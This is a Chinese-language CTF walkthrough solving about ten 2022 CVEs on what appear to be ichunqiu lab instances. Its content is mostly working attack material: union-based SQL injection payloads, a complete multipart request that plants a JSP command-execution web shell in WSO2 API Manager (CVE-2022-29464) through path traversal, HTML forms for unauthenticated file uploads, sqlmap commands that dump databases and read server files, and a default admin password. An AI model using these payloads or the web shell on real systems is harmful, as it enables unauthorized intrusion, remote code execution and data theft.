CVE-2022-32991

这里找一下源码审一下

根据漏洞编号搜到源码名字

plaintext

<@urlencode>-60377db362694'<@/urlencode>

plaintext

60377db362694' or '1

plaintext

60377db362694' order by 5 -- 
60377db362694' order by 6 --

plaintext

60377db362694' union select 1,2,3,4,5 --

plaintext

60377db362694' union select 1,2,(select group_concat(schema_name) from information_schema.schemata),4,5 --

plaintext

60377db362694' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='flag'),4,5 --

plaintext

60377db362694' union select 1,2,(select flag from ctf.flag),4,5 --

CVE-2022-30887

搭建起来

找一下用户名和密码

这里也很简单

这里全是任意文件上传

CVE-2022-29464

plaintext

https://github.com/wso2/product-apim/releases/tag/v4.0.0

plaintext

.\api-manager.bat

plaintext

POST /fileupload/toolsAny HTTP/2
Host: eci-2zebqk49mtyq78wkry75.cloudeci1.ichunqiu.com:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 882
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"

<FORM>
    <INPUT name='cmd' type=text>
    <INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"</br>"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--

CVE-2022-28525

plaintext

move_uploaded_file

看了一下这几个 upload 发现这个是存在未授权上传的

html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>upload</title>
</head>
<body>
<form action="http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/admin_includes/admin_edit_user.php" method="post" enctype="multipart/form-data">
    <input type="text" name="updateusersubmit" value="123">
    <input type="text" name="user_image" value="new">
    <input type="file" name="new_image"><br>
    <input type="submit" value="上传">

</form>
</body>
</html>

构造一下表单

接着到对应目录访问即可

plaintext

http://eci-2ze3p3ftillcjaoxi4jq.cloudeci1.ichunqiu.com/admin/images/zf.php

CVE-2022-28512

配置数据库信息的时候可以全局搜索 blog_admin_db

将密码填上

很明显的sql注入

plaintext

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5

plaintext

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 --dbs

plaintext

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf --tables

plaintext

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag --columns

plaintext

python .\sqlmap.py  --batch -u http://eci-2ze8f6pzti1nb9zy5f57.cloudeci1.ichunqiu.com/single.php?id=5 -D ctf -T flag -C flag --dump

CVE-2022-28060

明显的注入

这里也是很明显的sql注入因为正确的写法应该是

plaintext

$user_name = mysqli_real_escape_string($con, $user_name);

而这里只是处理了字符没有应用

这里还有一个文件上传

html

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>upload</title>
</head>
<body>
<form action="http://stu/admin/includes/admin_add_post.php" method="post" enctype="multipart/form-data">
    <input type="text" name="create_post" value="123">
    <input type="file" name="post_image"><br>
    <input type="submit" value="上传">

</form>
</body>
</html>

plaintext

python .\sqlmap.py  --batch -r D:\Download\sql.txt --dbs

plaintext

python .\sqlmap.py  --batch -r D:\Download\sql.txt -D php_cms --tables

没有flag 所以猜猜在文件里

plaintext

python .\sqlmap.py  --batch -r D:\Download\sql.txt --sql-shell

plaintext

select load_file('/flag')

CVE-2022-26201

注入挺多的

plaintext

python .\sqlmap.py  --batch -r D:\Download\sql.txt --dbs

plaintext

python .\sqlmap.py  --batch -r D:\Download\sql.txt --file-read  "/flag"

CVE-2022-26965

这里很明显文件上传接着解压

admin 登录进去

将 php压缩一下

plaintext

http://eci-2zeinn5hdxurnzllfr7s.cloudeci1.ichunqiu.com/data/themes/zf/zf.php

访问即可

CVE-2022-25578

admin tao 默认密码

CVE-2022-25488

很明显的sql注入

plaintext

python .\sqlmap.py  --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --dbs

plaintext

python .\sqlmap.py  --batch -u http://eci-2ze34jnwwd2dzf7jz8el.cloudeci1.ichunqiu.com/admin/ajax/avatar.php?id=1 --sql-shell

plaintext

select load_file('/flag')

CVE-2022-32991

CVE-2022-30887

CVE-2022-29464

CVE-2022-28525

CVE-2022-28512

CVE-2022-28060

CVE-2022-26201

CVE-2022-26965

CVE-2022-25578

CVE-2022-25488

微信扫一扫：分享